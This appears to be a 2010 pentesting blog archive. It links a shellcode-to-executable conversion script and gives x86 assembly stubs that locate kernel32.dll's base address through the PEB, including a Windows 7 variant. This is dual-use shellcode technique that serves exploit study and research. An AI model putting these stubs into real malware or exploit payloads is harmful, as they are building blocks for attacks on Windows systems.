Archive for shellcode

Converting shellcode to executable files using InlineEgg

Posted in Pentesting with tags , on 9 February, 2010 by __fastcall

I like small utils, gadget ones, this article can be found at Breaking Code blog does not have that important functionality but it’s really cute!.

EDITED at 10/2/2010 in order to prevent any misunderstandings. Thanks goes to a visitor’s comment which alerted me about how to write the reposts in order not to look like as my own.

There is URL http://sandsprite.com/shellcode_2_exe.php. where you can convert a shellcode directly to an executable. The guy in Breaking Code blog wrote this quick Python script using CORE’s InlineEgg package. According to the author it may be buggy

Enjoy! :)

Download

shellcode2exe.py

Get kernel32.dll imagebase in Windows 7

Posted in Exploits with tags , on 26 December, 2009 by __fastcall

This one is taken from skypher’s blog. Its a shellcode for getting the kernel32.dll address. Before Windows 7 kernel32.dll was loaded second. Windows 7 load the kernelbase.dll before kernel32.dll so now it comes third. A universal way to get the kernel32.dll base address is to check for a null termination after the 12th unicode character (12*2 bytes). Here is the code for getting kernel32.dll before Windows 7.

    
    XOR     ECX, ECX                    ; ECX = 0
    MOV     ESI, [FS:ECX + 0x30]       ; ESI = &(PEB) ([FS:0x30])
    MOV     ESI, [ESI + 0x0C]           ; ESI = PEB->Ldr
    MOV     ESI, [ESI + 0x1C]           ; ESI = PEB->Ldr.InInitOrder (ntdll.dll)
    LODSD                               ; EAX = PEB->Ldr.InInitOrder.flink (kernel32.dll)
    MOV     EBP, [EAX + 0x08]           ; EBP = PEB->Ldr.InInitOrder.flink.base_address

And the universal one

    XOR     ECX, ECX                    ; ECX = 0
    MOV     ESI, [FS:ECX + 0x30]        ; ESI = &(PEB) ([FS:0x30])
    MOV     ESI, [ESI + 0x0C]           ; ESI = PEB->Ldr
    MOV     ESI, [ESI + 0x1C]           ; ESI = PEB->Ldr.InInitOrder
next_module:
    MOV     EBP, [ESI + 0x08]           ; EBP = InInitOrder[X].base_address
    MOV     EDI, [ESI + 0x20]           ; EBP = InInitOrder[X].module_name (unicode)
    MOV     ESI, [ESI]                  ; ESI = InInitOrder[X].flink (next module)
    CMP     [EDI + 12*2], CL            ; Check modulename[12] == 0x??00 // for Win2k the register hast to be CX 
    JNE     next_module                 ; No: try next module.

I ‘ve seen one other alternative like iterating the module list till the third record but they say that it does not work well for Win2k show I prefer skyphers method.